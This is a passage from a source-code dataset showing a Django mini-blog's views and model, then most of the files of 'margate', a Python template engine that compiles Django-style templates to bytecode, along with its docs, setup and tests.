Dashboard\ndef dashboard(request):\n if request.user.is_authenticated:\n posts = Post.show_posts()\n user = request.user\n full_name = user.get_full_name()\n groups = user.groups.all()\n return render(request, 'app/dashboard.html', {\n 'posts': posts ,\n 'full_name': full_name,\n 'groups': groups\n })\n else:\n return redirect('login')\n\n# Add Post\ndef addPost(request):\n if request.user.is_authenticated:\n if request.method == 'POST':\n form = PostForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Posts added successfully.')\n return redirect('dashboard')\n else:\n form = PostForm()\n return render(request,'app/addPost.html', { 'form': form })\n\n else:\n return redirect('login')\n\n# Delete Post\ndef deletePost(request, id):\n if request.user.is_authenticated:\n if request.method == 'POST':\n post = Post.get_post(id)\n post.delete()\n return redirect('dashboard')\n else:\n return redirect('login')\n\n#Edit Post\ndef editPost(request, id):\n if request.user.is_authenticated:\n post = Post.get_post(id)\n if request.method == 'POST':\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n form.save()\n messages.success(request, 'Post updated successfully.')\n return redirect('dashboard')\n else:\n form = PostForm(instance=post)\n return render(request, 'app/editPost.html', { 'form': form })\n else:\n return redirect('login')\n\n# Register \ndef userRegister(request):\n if not request.user.is_authenticated:\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n user = form.save()\n group = Group.objects.get(name='Author')\n user.groups.add(group)\n messages.success(request, 'Congractulations! You have become an Author. Now please Login')\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request, 'app/register.html', { 'form': form })\n else:\n return redirect('dashboard')\n\n# Login \ndef userLogin(request):\n if not request.user.is_authenticated:\n if request.method == 'POST':\n form = UserLoginForm(request=request, data=request.POST)\n if form.is_valid():\n uname = form.cleaned_data.get('username')\n upass = form.cleaned_data.get('password')\n user = authenticate(username=uname, password=upass)\n print(user)\n if user is not None:\n login(request, user)\n messages.success(request, 'Logged in Successfully!!')\n return redirect('dashboard')\n else:\n form = UserLoginForm()\n return render(request, 'app/login.html', { 'form': form })\n else:\n return redirect('dashboard')\n\n# Logout \ndef userLogout(request):\n logout(request)\n return redirect('home')\n\n" }, { "alpha_fraction": 0.6411150097846985, "alphanum_fraction": 0.6515679359436035, "avg_line_length": 21, "blob_id": "76818e5262dd7fdc3b74a3ed2d295a187feecf28", "content_id": "3e04dff5e0162d5a6fcd1db30a47d72884495a9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 287, "license_type": "no_license", "max_line_length": 44, "num_lines": 13, "path": "/app/models.py", "repo_name": "arbaazkhan07/Django-MiniBlog", "src_encoding": "UTF-8", "text": "from django.db import models\n\nclass Post(models.Model):\n title = models.CharField(max_length=100)\n desc = models.TextField()\n\n @staticmethod\n def show_posts():\n return Post.objects.all()\n\n @staticmethod\n def get_post(id):\n return Post.objects.get(pk=id)\n\n" } ]
2
timmartin/stencil
https://github.com/timmartin/stencil
89889159865736184fddab977919609cb93ce19f
81e6c2939cafae1009a9866590e9dd23295d4a9f
12aedff0827d3e881dfd052d25aadc2038a8c68b
refs/heads/master
2021-01-11T14:55:44.703602
2017-07-04T19:43:16
2017-07-04T19:43:50
80,252,832
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6021126508712769, "alphanum_fraction": 0.6021126508712769, "avg_line_length": 27.399999618530273, "blob_id": "e2e9392ff4e558255ea03a0db2f9e8a6fc37f9f1", "content_id": "aca78220e2830dbc776f07b16bc8f44876fbda2e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 852, "license_type": "permissive", "max_line_length": 74, "num_lines": 30, "path": "/tests/compiler_test.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "import unittest\nimport unittest.mock\nimport io\nfrom collections import namedtuple\n\nfrom margate.compiler import Compiler\n\n\nclass CompilerTest(unittest.TestCase):\n\n def test_extend_template(self):\n template_locator = unittest.mock.MagicMock()\n template_locator.find_template.return_value = '/wherever/foo.html'\n\n mock_file = io.StringIO(\"Title: {% block title %}{% endblock %}\")\n\n mock_open = unittest.mock.MagicMock(return_value=mock_file)\n\n with unittest.mock.patch('builtins.open', mock_open):\n compiler = Compiler(template_locator)\n\n function = compiler.compile(\n '{% extends \"base.html\" %}'\n '{% block title %}'\n 'The title'\n '{% endblock %}')\n\n self.assertEquals(\n function(),\n \"Title: The title\")\n" }, { "alpha_fraction": 0.6692422032356262, "alphanum_fraction": 0.6692422032356262, "avg_line_length": 31.669902801513672, "blob_id": "ed3c924212f2a2c65ba1757c9041fd0b859092a9", "content_id": "33972b70b6c372c99a5e7deff68b3e9661620f65", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3365, "license_type": "permissive", "max_line_length": 78, "num_lines": 103, "path": "/margate/block_parser.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"The block parser splits a template into the blocks that make it\nup. There are three different sorts of data in a template that get\nhandled in different ways:\n\n* Literal text, which just gets embedded in the output (but may be\n skipped or repeated by executing code around it).\n* Executable code\n* Embedded variable expressions that get expanded into text output.\n\nIt's implemented as a state machine, where the template starts out in\nliteral text and transitions to a different state depending on whether\nit encounters ``{{``, ``}}``, ``{%`` or ``%}``.\n\n\"\"\"\n\nfrom . import code_generation\n\n\nclass LiteralState:\n \"\"\"The literal state is the state the block parser is in when it is\n processing anything that will be included in the template output\n as a literal. The template starts out in literal state and\n transitions back into it every time a block is closed.\n \"\"\"\n\n def __init__(self, text):\n self.text = text\n\n def __eq__(self, other):\n if not isinstance(other, LiteralState):\n return False\n\n return self.text == other.text\n\n def __repr__(self):\n return \"<LiteralState %r>\" % self.text\n\n def accept_open_expression(self, offset, length):\n return (ExpressionState(self.text[offset + length:]),\n code_generation.Literal(self.text[:offset]))\n\n def accept_open_execution(self, offset, length):\n return (ExecutionState(self.text[offset + length:]),\n code_generation.Literal(self.text[:offset]))\n\n def accept_close_expression(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_execution(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_end_input(self):\n return (None, code_generation.Literal(self.text))\n\n\nclass ExecutionState:\n \"\"\"Execution state is the state when any kind of code execution is\n occurring. This includes the start and ends of blocks.\n \"\"\"\n\n def __init__(self, text):\n self.text = text\n\n def accept_open_expression(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_open_execution(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_expression(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_execution(self, offset, length):\n return (LiteralState(self.text[offset + length:]),\n code_generation.Execution(self.text[:offset].strip()))\n\n def accept_end_input(self):\n raise Exception(\"Syntax error\")\n\n\nclass ExpressionState:\n \"\"\"Expression state occurs when processing a ``{{ ... }}`` expression\n that embeds the value of an expression into the output.\n\n \"\"\"\n def __init__(self, text):\n self.text = text\n\n def accept_open_expression(self, offset, length):\n raise Exception(\"Syntax error: opened expression inside expression\")\n\n def accept_open_execution(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_execution(self, offset, length):\n raise Exception(\"Syntax error\")\n\n def accept_close_expression(self, offset, length):\n return (LiteralState(self.text[offset + length:]),\n code_generation.VariableExpansion(self.text[:offset].strip()))\n\n def accept_end_input(self):\n raise Exception(\"Syntax error\")\n" }, { "alpha_fraction": 0.6892988681793213, "alphanum_fraction": 0.6892988681793213, "avg_line_length": 16.828947067260742, "blob_id": "c6d5814e0e811f4857b181048d60473e95c1745a", "content_id": "551f8928599359a240e605b8198e116d802c4d5c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1355, "license_type": "permissive", "max_line_length": 68, "num_lines": 76, "path": "/docs/reference.rst", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "Reference\n=========\n\nThe process of building a template into a function has the following\nsteps:\n\n* The template is broken down into blocks (such as literal text and\n code execution) that are treated differently. This is handled by\n :py:mod:`the block parser <margate.block_parser>`.\n* The resultant sequence of blocks is passed to the\n :py:class:`~margate.parser.Parser` to be turned into a parse tree.\n* The parse tree is processed by :py:mod:`code generation\n <margate.code_generation>` to make Python bytecode.\n\nCompiler\n--------\n\n.. automodule:: margate.compiler\n\n.. autoclass:: Compiler\n :members:\n\n.. autoclass:: TemplateLocator\n\nCode generation\n---------------\n\n.. automodule:: margate.code_generation\n\n.. autoclass:: Sequence\n :members:\n\n.. autoclass:: ForBlock\n :members:\n\n.. autoclass:: IfBlock\n :members:\n\n.. autoclass:: ExtendsBlock\n :members:\n\n.. autoclass:: ReplaceableBlock\n :members:\n\n.. autoclass:: VariableExpansion\n :members:\n\n.. autoclass:: Literal\n :members:\n\n.. autoclass:: Execution\n :members:\n\nBlock parser\n------------\n\n.. automodule:: margate.block_parser\n\n.. autoclass:: LiteralState\n :members:\n\n.. autoclass:: ExecutionState\n :members:\n\n.. autoclass:: ExpressionState\n :members:\n\nParser\n------\n\n.. automodule:: margate.parser\n\n.. autoclass:: Parser\n :members:\n\n.. autofunction:: parse_expression\n" }, { "alpha_fraction": 0.6170306205749512, "alphanum_fraction": 0.6176168918609619, "avg_line_length": 33.81122589111328, "blob_id": "fdd8ddc80d7284b4fe2329a6a76f2e57c89999d7", "content_id": "5f7c4edf66eefe0ce09fc1e4e4f40bd70f639cd5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6823, "license_type": "permissive", "max_line_length": 74, "num_lines": 196, "path": "/margate/parser.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"The parser converts the template language into a usable structured\nform.\n\nThere are two layers to the parsing: breaking the template down into\nblocks (which is done by the :py:mod:`~margate.block_parser` module),\nand parsing the expressions that appear in the execution blocks within\nthe template.\n\nThe parser in this module uses a combination of ad hoc parsing,\n`funcparserlib <https://pypi.python.org/pypi/funcparserlib>`_ and\n`ast.parse\n<https://docs.python.org/3/library/ast.html#ast.parse>`_. The\ntop-level rules in the language (``if``, ``for``, ``endif`` etc.) are\nhandled ad hoc since they are not recursive. However, the expression\nthat is given as an argument to ``if`` is an arbitrary expression and\nparsed\n\n\"\"\"\n\nimport re\nimport ast\nfrom collections import namedtuple\nimport funcparserlib.parser\n\nfrom . import code_generation, compiler\n\nIfNode = namedtuple('IfNode', ['expression'])\nForNode = namedtuple('ForNode', ['variable', 'collection'])\nExtendsNode = namedtuple('ExtendsNode', ['template_name'])\nBlockNode = namedtuple('BlockNode', ['block_name'])\n\n\nclass UnsupportedElementException(Exception):\n pass\n\n\ndef parse_expression(expression):\n \"\"\"Parse an expression that appears in an execution node, i.e. a\n block delimited by ``{% %}``.\n\n This can be a compound expression like a ``for`` statement with\n several sub-expressions, or it can just be a single statement such\n as ``endif``.\n\n :param list expression: Tokenised expression.\n\n \"\"\"\n from funcparserlib.parser import a, skip, some\n\n # For if expressions, we rely on the Python parser to process the\n # expression rather than using our own parser.\n if expression[0] == 'if':\n return IfNode(ast.parse(' '.join(expression[1:]), mode=\"eval\"))\n\n variable_name = some(lambda x: re.match(r'[a-zA-Z_]+', x))\n\n # TODO We use the same function twice, first to match the token\n # and then to extract the value we care about from the token\n # (namely the contents of the quoted string). This smells wrong.\n def extract_quoted_string(x):\n result = re.match(r'\\\"([^\\\"]*)\\\"', x)\n if result:\n return result.groups(1)\n\n quoted_string = some(extract_quoted_string)\n\n for_expression = (\n skip(a('for'))\n + (variable_name >> str)\n + skip(a('in'))\n + (variable_name >> str))\n\n extends_expression = (\n skip(a('extends'))\n + (quoted_string >> extract_quoted_string))\n\n block_expression = (\n skip(a('block'))\n + (variable_name >> str))\n\n def make_for_node(x): return ForNode(*x)\n\n def make_extends_node(x): return ExtendsNode(*x)\n\n parser = ((for_expression >> make_for_node)\n | (extends_expression >> make_extends_node)\n | (block_expression >> BlockNode))\n\n try:\n return parser.parse(expression)\n except funcparserlib.parser.NoParseError as e:\n raise Exception(\"Invalid expression '%s'\" % expression)\n\n\nclass Parser:\n \"\"\"The Parser is responsible for turning a template in \"tokenised\"\n form into a tree structure from which it is straightforward to\n generate bytecode.\n\n The input is in the form of a flat list of atomic elements of the\n template, where literal text (of any length) is a single element,\n and a ``{% %}`` or ``{{ }}`` expression is a single element.\n\n Figuring out nesting of starting and ending of loops happens\n within the parser.\n\n \"\"\"\n\n def __init__(self, template_locator=None):\n\n def _get_related_template(template_name):\n template = template_locator.find_template(template_name)\n if not template:\n raise FileNotFoundError()\n with open(template) as template_file:\n compiler_obj = compiler.Compiler(template_locator)\n return compiler_obj._get_chunks(template_file.read())\n\n self._sub_template_locator = _get_related_template\n\n def parse(self, tokens):\n \"\"\"Parse a token sequence into a\n :py:class:`~margate.code_generation.Sequence` object.\n\n \"\"\"\n\n sequence = code_generation.Sequence()\n\n self._parse_into_sequence(sequence, tokens)\n\n return sequence\n\n def _parse_into_sequence(self, sequence, tokens,\n termination_condition=None):\n token_iter = iter(tokens)\n\n try:\n while True:\n token = next(token_iter)\n if termination_condition and termination_condition(token):\n return\n\n if isinstance(token, code_generation.Execution):\n # An execution node always starts a subsequence\n # (i.e. a node in the tree with its own\n # children). Since we've ruled out the case where\n # this is the termination of an existing block,\n # any Execution node is the start of a new block.\n block = self._parse_subsequence(token, token_iter)\n sequence.add_element(block)\n else:\n sequence.add_element(token)\n except StopIteration:\n return\n\n def _parse_subsequence(self, token, token_iter):\n node = parse_expression(\n re.split(r'\\s+',\n token.expression.strip()))\n\n if isinstance(node, IfNode):\n block = code_generation.IfBlock(node.expression)\n inner_termination_condition = self._end_sequence(\"endif\")\n elif isinstance(node, ForNode):\n block = code_generation.ForBlock(node)\n inner_termination_condition = self._end_sequence(\"endfor\")\n elif isinstance(node, ExtendsNode):\n if self._sub_template_locator is None:\n raise UnsupportedElementException(\n \"Parser is not configured to support \"\n \"extending other templates\")\n\n content = self._sub_template_locator(\n node.template_name)\n parsed = self.parse(content)\n block = code_generation.ExtendsBlock(parsed)\n inner_termination_condition = None\n elif isinstance(node, BlockNode):\n block = code_generation.ReplaceableBlock(\n node.block_name)\n inner_termination_condition = self._end_sequence(\"endblock\")\n else:\n raise Exception(\"Unrecognised block type\")\n\n self._parse_into_sequence(block.sequence,\n token_iter,\n inner_termination_condition)\n\n return block\n\n def _end_sequence(self, end_token):\n def is_end_token(token):\n return (isinstance(token, code_generation.Execution)\n and token.expression == end_token)\n\n return is_end_token\n" }, { "alpha_fraction": 0.6312466859817505, "alphanum_fraction": 0.6317727565765381, "avg_line_length": 27.37313461303711, "blob_id": "113304ec07f36e078e57f196bc962d9c1e7321dd", "content_id": "078b3ddbe9161cac0bacda13e779b43e4207ebcf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1901, "license_type": "permissive", "max_line_length": 79, "num_lines": 67, "path": "/margate/django/__init__.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"\nCode for interfacing Margate with Django\n\"\"\"\n\nfrom django.template import TemplateDoesNotExist\nfrom django.template.utils import get_app_template_dirs\nfrom django.template.loaders.filesystem import Loader as DjangoFileSystemLoader\nfrom django.template.backends.base import BaseEngine\n\nfrom margate.compiler import Compiler\n\n\nclass MargateLoader(DjangoFileSystemLoader):\n def get_dirs(self):\n return get_app_template_dirs('margate')\n\n\nclass MargateEngine(BaseEngine):\n app_dirname = \"margate\"\n\n def __init__(self, params):\n params = params.copy()\n\n try:\n params.pop('OPTIONS')\n except KeyError:\n pass\n\n super(MargateEngine, self).__init__(params)\n\n self.loader = MargateLoader(self)\n self.file_charset = 'utf-8'\n self.debug = False\n self.template_libraries = []\n self.template_builtins = []\n self.cache = {}\n\n def get_template(self, template_name):\n if template_name in self.cache:\n return self.cache[template_name]\n else:\n compiler = Compiler()\n template_func = compiler.compile(self.find_template(template_name))\n template = Template(template_func)\n self.cache[template_name] = template\n return template\n\n def find_template(self, name):\n tried = []\n\n for source in self.loader.get_template_sources(name):\n try:\n contents = self.loader.get_contents(source)\n except TemplateDoesNotExist:\n tried.append((source, 'Source does not exist'))\n else:\n return contents\n\n raise TemplateDoesNotExist(name, tried=tried)\n\n\nclass Template:\n def __init__(self, template_func):\n self.template_func = template_func\n\n def render(self, context=None, request=None):\n return self.template_func(**context)\n" }, { "alpha_fraction": 0.7026459574699402, "alphanum_fraction": 0.7039059400558472, "avg_line_length": 28.382715225219727, "blob_id": "8ffc1b8fa74d7b917831a40bf51c392de1a607c9", "content_id": "f4f9ae6f44105859e2ad21a9d82a8ba5a73eebbd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2381, "license_type": "permissive", "max_line_length": 70, "num_lines": 81, "path": "/docs/index.rst", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\nWelcome to Margate's documentation!\n===================================\n\n.. toctree::\n :maxdepth: 2\n :caption: Contents:\n\n django\n todo_list\n reference\n\nIntroduction\n------------\n\nMargate is a templating engine for Python that compiles templates down\nto Python bytecode. It is mostly Django-compatible in spirit, though\nit falls short of being a drop-in replacement for Django templates.\n\nEarly performance testing suggests that it is around 10 times faster\nthan regular Django templates.\n\nExample\n-------\n\nSimply instantiate a :py:class:`~margate.compiler.Compiler` and call\nits :py:meth:`~margate.compiler.Compiler.compile()` method with the\ntemplate source::\n\n template_source = \"\"\"\n <p>Hello {{ person }}, my name is {{ me }}\n \"\"\"\n\n compiler = margate.compiler.Compiler()\n template_function = compiler.compile(template_source)\n\nYou now have a function that can be called to yield the rendered\ncontent. Pass variable values in keyword arguments::\n\n print(template_function(person=\"alice\",\n me=\"a template\"))\n\nFAQ\n---\n\nWhy oh why?\n'''''''''''\n\nMostly to learn about Python bytecode.\n\nYou don't really expect the speed benefit to be worth it, do you?\n'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n\nTemplate rendering is extremely unlikely to be the bottleneck in your\nweb application. Optimising it will at best save a constant overhead\nfrom each page view, and will have a proportionately lower impact on\nyour slowest pages.\n\nOn the other hand, it's free speed. It can probably save you a few\nmilliseconds per page view, which might help when you're trying to get\nyour landing page to load as fast as possible. Assuming the templating\nlanguage has all the same features, why wouldn't you? Template\nexpansion probably can't be parallelised with anything else your web\napp is doing, so miliseconds here contribute directly to the bottom\nline.\n\nWhat's with the name?\n'''''''''''''''''''''\n\nThe library was originally called Stencil, but it turns out that lots\nof people call their templating library Stencil, so I had to change.\n\nI hate spending time thinking of names for projects, so when I get\nstuck I just use the name of an English seaside town. There are plenty\nof them and they are reasonably unique and memorable names.\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n" }, { "alpha_fraction": 0.7725631594657898, "alphanum_fraction": 0.7739169597625732, "avg_line_length": 36.559322357177734, "blob_id": "735f7bda472ae0f1abd6609dc9cd93dda2080c29", "content_id": "98789434acd735205b89016ad67f8a658fc1783b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2216, "license_type": "permissive", "max_line_length": 70, "num_lines": 59, "path": "/README.rst", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "I originally wrote Margate as an exercise in learning about Python\nbytecode, but I released it in case it was somewhat useful. However,\nafter releasing it I discovered that Jinja2 also includes a bytecode\ngenerator, so probably makes this obsolete for any practical\npurposes. I'm not actively maintaining this project any more.\n\nMargate\n=======\n\nMargate is a library that provides a Django-compatible template engine\nwhere the templates compile to raw Python bytecode. In theory, this\nwill make them expand faster. This is at a very early stage and is\nexperimental.\n\nFeatures\n--------\n\nCurrently Margate supports the following:\n\n* ``for`` loops\n* ``if`` blocks with arbitrary conditions (but not ``else`` blocks)\n* ``extends`` nodes and ``block`` nodes that can be overridden in\n extending templates\n* Arbitrary nesting of the above (though this isn't well tested yet)\n* Embedding expression values in output\n\nOperation\n---------\n\nThe compiler takes a text template and ultimately outputs an ordinary\nPython function, which you can call (passing context data as the\n`kwargs`) to get rendered text output.\n\nThe first stage is to parse it into a tree structure. In theory this\nmight be able to reuse some parsing code from within Django, but the\nAPI doesn't really seem to be designed to be extended. Instead,\nthere's a small ad hoc parser. First it \"tokenises\", where each\n\"token\" is a chunk of the template (a literal string, a variable\ninclusion or a `{% xyz %}` block. The expressions inside the execution\nblocks also get parsed as a separate operation.\n\nThe resultant parse tree is processed by a code generator that\ngenerates abstract bytecode, using the `Bytecode\n<https://bytecode.readthedocs.io/en/latest/>`_ module to turn this\ninto concrete bytecode that can be processed natively by the Python\nvirtual machine. Code generation just expands out some templates with\nhand-generated bytecode.\n\nPerformance tests\n-----------------\n\nI've only done minimal performance tests so far, but on a couple of\nsimple cases Margate is 10 times faster than \"real\" Django\ntemplates.\n\nSee `performance_test.py` for the details.\n\nThis probably means you can shave a few milliseconds off your page\nload time by using Margate.\n" }, { "alpha_fraction": 0.6586452722549438, "alphanum_fraction": 0.6586452722549438, "avg_line_length": 25.069766998291016, "blob_id": "e3ab0f56765bff05ebac3d13dbeff819072f6005", "content_id": "5bd8af2ae3842a2747c4c664030befdd86bb38f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1122, "license_type": "permissive", "max_line_length": 70, "num_lines": 43, "path": "/docs/django.rst", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "Using from Django\n=================\n\nLanguage compatibility\n----------------------\n\nThe Margate language is very similar in style to the built-in Django\ntemplate engine, but differs in a number of important details.\n\nMost importantly, ``{{ }}`` expressions (and expressions in ``for``\nloop commands etc.) are treated as arbitrary Python code. This means\nthat they are more flexible than Django template language, but\nprevents you from taking advantage of the shortcuts that automatically\nconvert object attributes into dictionary member lookup.\n\nFor example, instead of writing::\n\n {% for tag in blog_post.tags %}\n ...\n {% endfor %}\n\nif ``blog_post`` is a dictionary, you will need to write::\n\n {% for tag in blog_post[\"tags\"] %}\n ...\n {% endfor %}\n\nAnother limitation is that none of the built-in filters are currently\nsupported.\n\nConfiguring Django to use the engine\n------------------------------------\n\nTo enable Margate in Django, simply add it to the ``TEMPLATES`` in\n``settings.py``::\n\n TEMPLATES = [\n {\n 'BACKEND': 'margate.django.MargateEngine',\n 'DIRS': [],\n 'APP_DIRS': True\n }\n ]\n\n" }, { "alpha_fraction": 0.6261342763900757, "alphanum_fraction": 0.6261342763900757, "avg_line_length": 27.256410598754883, "blob_id": "43f59a97e5040c874866956511659a54c4ffa7aa", "content_id": "68149f41aebcfb7a36ba8f31f72b2ee8569ff549", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1102, "license_type": "permissive", "max_line_length": 70, "num_lines": 39, "path": "/margate/__init__.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"\nCompiled templates\n\"\"\"\n\nimport os.path\nfrom django.template import TemplateDoesNotExist\nfrom django.template.backends.base import BaseEngine\n\n\nclass Template:\n def __init__(self, code, engine):\n self.code = code\n self.engine = engine\n\n super(Template, self).__init__()\n\n def render(self, context=None, request=None):\n return self.code\n\n\nclass FasterEngine(BaseEngine):\n app_dirname = 'compiled'\n\n def __init__(self, params):\n params.pop('OPTIONS')\n\n super(FasterEngine, self).__init__(params)\n\n def get_template(self, template_name):\n for template_dir in self.template_dirs:\n candidate_file = os.path.join(template_dir, template_name)\n if os.path.exists(candidate_file):\n with open(candidate_file, \"r\") as template_contents:\n return Template(template_contents.read(), self)\n raise TemplateDoesNotExist(\"Template %s does not exist\"\n % template_name)\n\n def from_string(self, template_code):\n return Template(template_code, self)\n" }, { "alpha_fraction": 0.8163265585899353, "alphanum_fraction": 0.8163265585899353, "avg_line_length": 23.25, "blob_id": "973549fd176abadd3d8035f46085ec37907585dc", "content_id": "069fb509d54ca998880b491cc0e0e7d695dc38a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "permissive", "max_line_length": 44, "num_lines": 4, "path": "/tests/__init__.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "import hy\n\nfrom .hy_parser_test import HyParserTest\nfrom .hy_compiler_test import HyCompilerTest\n\n" }, { "alpha_fraction": 0.5543872117996216, "alphanum_fraction": 0.5554749965667725, "avg_line_length": 29.9887638092041, "blob_id": "33af19cc80fd87f4bfa4c5a2fa7319c49b4d9716", "content_id": "44ceb410fa6376fbd6e635f870c5e56260123984", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2758, "license_type": "permissive", "max_line_length": 73, "num_lines": 89, "path": "/margate/compiler.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "\"\"\"The compiler module contains the public interface to the library.\n\n\"\"\"\n\nimport re\nimport io\nfrom bytecode import Bytecode, Instr\n\nfrom . import parser, block_parser\n\n\nclass TemplateLocator:\n \"\"\"The template locator abstracts the details of locating templates\n when one template extends another (such as with the ``{% extends %}``\n tag)self.\n \"\"\"\n\n def find_template(self, template_name):\n pass\n\n\nclass Compiler:\n \"\"\"The Compiler takes a template in string form and returns bytecode\n that implements the template.\n \"\"\"\n\n def __init__(self, template_locator=None):\n if template_locator is None:\n template_locator = TemplateLocator()\n\n self._template_locator = template_locator\n\n def compile(self, source):\n \"\"\"Compile the template source code into a callable function.\n\n :return: A callable function that returns rendered content as\n a string when called.\n \"\"\"\n bytecode = self._make_bytecode(source, self._template_locator)\n\n def inner(**local_scope):\n local_scope[\"_output\"] = io.StringIO()\n exec(bytecode, {}, local_scope)\n return local_scope['_output'].getvalue()\n\n return inner\n\n def _get_chunks(self, source):\n state = block_parser.LiteralState(source)\n\n while state:\n match = re.search(r\"\\{\\{|\\}\\}|\\{%|%\\}\",\n state.text)\n if match is None:\n (state, chunk) = state.accept_end_input()\n else:\n separator = match.group(0)\n\n if separator == \"{{\":\n action = state.accept_open_expression\n elif separator == \"}}\":\n action = state.accept_close_expression\n elif separator == \"{%\":\n action = state.accept_open_execution\n elif separator == \"%}\":\n action = state.accept_close_execution\n else:\n raise Exception(\"Unrecognised separator\")\n\n (state, chunk) = action(match.start(0),\n len(match.group(0)))\n\n yield chunk\n\n def _make_bytecode(self, source, template_locator):\n instructions = []\n symbol_table = {\n \"write_func\": io.StringIO.write\n }\n\n parser_obj = parser.Parser(self._template_locator)\n sequence = parser_obj.parse(self._get_chunks(source))\n\n for item in sequence.elements:\n instructions += item.make_bytecode(symbol_table)\n\n bytecode = Bytecode(instructions + [Instr(\"LOAD_CONST\", None),\n Instr(\"RETURN_VALUE\")])\n return bytecode.to_code()\n" }, { "alpha_fraction": 0.29729729890823364, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 11.333333015441895, "blob_id": "fc2651f87b34f7d8e4b77e321a132f2ba54fbf47", "content_id": "8704b5d8623035808e2b97896d64aaf44cf1717e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 37, "license_type": "permissive", "max_line_length": 13, "num_lines": 3, "path": "/test_requirements.txt", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "flake8==3.2.1\nnose==1.3.7\nhy==0.12.1\n" }, { "alpha_fraction": 0.505464494228363, "alphanum_fraction": 0.5245901346206665, "avg_line_length": 27.153846740722656, "blob_id": "59caa16bf196178456587ad25b0837acb9128a9d", "content_id": "20bb011027918ca9481afb1af3250f0c1f884fea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "permissive", "max_line_length": 46, "num_lines": 13, "path": "/setup.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(name=\"margate\",\n version='0.0.1',\n description='Faster Django templates',\n author='Tim Martin',\n author_email='[email protected]',\n license='MIT',\n packages=['margate'],\n install_requires=['django',\n 'bytecode>=0.5',\n 'funcparserlib>=0.3'],\n zip_safe=False)\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.7291666865348816, "avg_line_length": 15, "blob_id": "9e8018f8693120d275e26154537591b79eacfed0", "content_id": "b56b16ce3632f02bb6d38f15fbb7ee7000c502a6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 48, "license_type": "permissive", "max_line_length": 20, "num_lines": 3, "path": "/requirements.txt", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "django==1.10\nbytecode==0.5\nfuncparserlib==0.3.6\n" }, { "alpha_fraction": 0.5076410174369812, "alphanum_fraction": 0.5112531185150146, "avg_line_length": 35.35353469848633, "blob_id": "032828faae311604bd6889bc3b31df7ebf06de03", "content_id": "bf34f84c96344bd9c6d053704e27804fd3efd411", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3599, "license_type": "permissive", "max_line_length": 78, "num_lines": 99, "path": "/tests/parser_test.py", "repo_name": "timmartin/stencil", "src_encoding": "UTF-8", "text": "import unittest\nimport unittest.mock\nimport ast\nimport io\n\nfrom margate.parser import (Parser, parse_expression, IfNode, ForNode,\n ExtendsNode)\nfrom margate.code_generation import (Literal, Sequence, IfBlock,\n ForBlock, ExtendsBlock, ReplaceableBlock,\n Execution)\n\n\nclass ParserTest(unittest.TestCase):\n def test_simple_sequence(self):\n parser = Parser()\n\n sequence = parser.parse([Literal(\"Foo\"),\n Literal(\"Bar\")])\n\n self.assertEqual(2, len(sequence.elements))\n\n def test_parse_if_block(self):\n parser = Parser()\n\n sequence = parser.parse([Literal(\"Foo\"),\n Execution(\"if True\"),\n Literal(\"Bar\"),\n Execution(\"endif\"),\n Literal(\"Baz\")])\n\n self.assertEqual(sequence.elements[0],\n 